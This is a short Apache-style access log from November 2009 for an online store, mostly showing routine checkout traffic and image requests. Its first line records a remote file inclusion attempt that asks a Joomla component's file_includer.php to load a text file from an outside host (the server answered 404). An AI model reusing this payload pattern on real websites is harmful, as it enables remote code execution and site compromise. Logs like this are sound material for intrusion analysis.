116.127.121.116 - - [13/Nov/2009:03:59:27 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.247.11.218 - - [13/Nov/2009:03:59:43 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1153775317D1C20024CB08I+M37+ENG HTTP/1.1" 200 58765 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1153775E1E315200142B08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:59:48 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L115377571701920057CB08I+M37+ENG HTTP/1.1" 200 72824 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1153775317D1C20024CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:59:53 -0500] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115377571701920057CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:59:53 -0500] "GET /images/AMEX.GIF HTTP/1.1" 200 2378 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115377571701920057CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:59:54 -0500] "GET /images/DISCOVER.GIF HTTP/1.1" 200 2579 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L115377571701920057CB08I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
